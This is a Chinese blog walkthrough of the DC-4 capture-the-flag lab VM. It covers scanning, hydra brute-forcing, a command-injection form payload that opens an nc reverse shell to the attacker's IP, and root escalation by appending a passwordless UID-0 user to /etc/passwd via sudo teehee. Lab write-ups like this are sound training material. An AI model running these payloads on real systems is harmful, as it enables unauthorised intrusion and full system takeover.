DC-4 靶场实战详解 - CSDN 博客 文章浏览阅读 3.3k 次,点赞 7 次,收藏 8 次。DC-4 靶场实战详解_dc-4 靶场 https://blog.csdn.net/a310034188/article/details/123192398

# Web 渗透

设置 DC-4 网站为 NAT 自动获取 IP 后 扫描得到靶机地址访问

1
arp-scan -l  # 扫描网段机器  192.168.111.140 靶机地址

扫描地址服务还是 2280

1
nmap -p- -sV 192.168.111.140 

正常考虑是看是不是 Nday 没有插件就工具指纹识别,但并不是什么框架或 cms 服务是 Nginx 反代版本 1.15.10 , 这个版本看了一圈也没有利用的历史漏洞,但有一个 PHP 解析漏洞不过需要上传图片功能点

目录爆破也会重定向到 index.php 直接上字典爆破

# 反弹 Shell 翻找文件

密码 happy 进入后台后发现一处功能点可以直接系统命令那么上 nc 反弹

1
2
3
4
radio=nc+-e+/bin/bash+192.168.111.136+5555&submit=Run
nc -lvp 5555


1
python -c 'import pty;pty.spawn("/bin/bash")'  # 得到交互面板

到处翻翻翻得到了一些密码本还有在 /home 目录下的 3 个用户 之前端口扫描还有 ssh 利用 3 个用户还有密码本上九头蛇爆破

# ssh 连接主机

爆破出一个用户的 ssh 账户连接看看

1
2
3

hydra -L 1.txt -P pass.txt 192.168.111.140 ssh -s 22

连接进去后又是一顿翻看到了邮件找到了 charles 用户的账户密码,直接切换连接

1
2
3
4
5
6
7
8
9
10
11
12
ssh jim@192.168.111.140 


cd var/spool/mail # 进入邮件目录

cat jim # 发现了 charles用户密码


su charles # 切换用户



然后开始提权发现了 teehee 命令 可以写一些内容进去,这个命令的作用是追加内容到指定文件但又不覆盖原文件 -a 参数追加,那么我们可以追加内容到 etc/passwd 目录下 等于重新创建了一个管理员用户达到提权的目的

1
sudo  -l  #  查看当前用户可以执行的root权限命令

# teehee 追加用户提权

teehee 追加 admin 用户没有密码,完成后切换用户打印 flag 完成

1
2
3
4
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
# 用户名admin 没有密码为管理员权限 进入的时候运行/bin/bash


更新于 阅读次数